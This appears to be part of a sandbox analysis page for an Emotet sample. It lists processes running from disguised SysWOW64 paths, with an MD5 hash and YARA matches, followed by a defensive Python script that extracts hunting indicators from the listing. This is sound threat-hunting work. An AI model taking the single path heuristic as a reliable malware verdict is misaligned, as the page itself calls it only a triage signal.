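General

Start time:16:30:09
Start date:23/02/2021
Path:C:\Windows\SysWOW64\glu32\usp10.exe
Commandline:C:\Windows\SysWOW64\glu32\usp10.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001C.00000002.439928850.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

General

Start time:16:30:12
Start date:23/02/2021
Path:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
Commandline:C:\Windows\SysWOW64\dllhst3g\KBDINTAM.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
Yara matches:
• Rule: JoeSecurity_Emotet, Description: Yara detected Emotet, Source: 0000001D.00000002.443777034.0000000000401000.00000020.00000001.sdmp, Author: Joe Security

General

Start time:16:30:37
Start date:23/02/2021
Path:C:\Windows\SysWOW64\d3dramp\mprdim.exe
Commandline:C:\Windows\SysWOW64\d3dramp\mprdim.exe
Imagebase:0xa40000
File size:662528 bytes
MD5 hash:13B9D586BB973AC14BFA24E4AE7B24F1
"""


def parse_process_blocks(text):
    """Split a Joe Sandbox process listing into one dict per 'General' block."""
    blocks, current = [], None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "General":
            current = {"yara": []}
            blocks.append(current)
        elif current is None:
            continue
        elif line.startswith("•"):
            # Bullet under "Yara matches:": keep the rule name and the dump it hit in.
            m = re.match(r"•\s*Rule:\s*([^,]+),.*?Source:\s*([^,\s]+)", line)
            if m:
                current["yara"].append({"rule": m.group(1).strip(), "source": m.group(2)})
        else:
            key, sep, value = line.partition(":")
            if sep:
                current[key.strip()] = value.strip()
    return blocks


def group_by_md5(blocks):
    """Map each MD5 to every path it ran from: one binary, many module-like names."""
    groups = defaultdict(list)
    for b in blocks:
        if "MD5 hash" in b and "Path" in b:
            groups[b["MD5 hash"].upper()].append(b["Path"])
    return dict(groups)


# Assumed allowlist of SysWOW64 subfolders that legitimately hold executables
# (wbem does); extend it for your own estate before using this as a detection.
KNOWN_SYSWOW64_EXE_DIRS = {"wbem"}
SYSWOW64_SUBDIR_EXE = re.compile(
    r"^[A-Za-z]:\\Windows\\SysWOW64\\([^\\]+)\\([^\\]+)\.exe$", re.IGNORECASE)


def is_suspicious_syswow64_path(path):
    """True for an .exe exactly one folder below SysWOW64 in a non-allowlisted folder."""
    m = SYSWOW64_SUBDIR_EXE.match(path)
    return bool(m) and m.group(1).lower() not in KNOWN_SYSWOW64_EXE_DIRS


def summarize(text):
    """Parse a listing and return hashes, their paths and the paths worth hunting for."""
    by_md5 = group_by_md5(parse_process_blocks(text))
    flagged = sorted(p for paths in by_md5.values() for p in paths
                     if is_suspicious_syswow64_path(p))
    return {"by_md5": by_md5, "flagged_paths": flagged}


if __name__ == "__main__":
    result = summarize(SAMPLE_REPORT)
    for md5, paths in result["by_md5"].items():
        print(md5, "ran from", len(paths), "paths")
    for p in result["flagged_paths"]:
        print("hunt:", p)
```

Pasting the full process listing from this page into SAMPLE_REPORT yields a single MD5 with eleven paths, which is the indicator set to hunt for on other hosts: the hash itself, and any .exe created one level below SysWOW64 in a folder that is not on the allowlist. The allowlist matters because Windows does ship executables in some SysWOW64 subfolders, so the path check alone is a triage signal, not a verdict.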

Disassembly

Code Analysis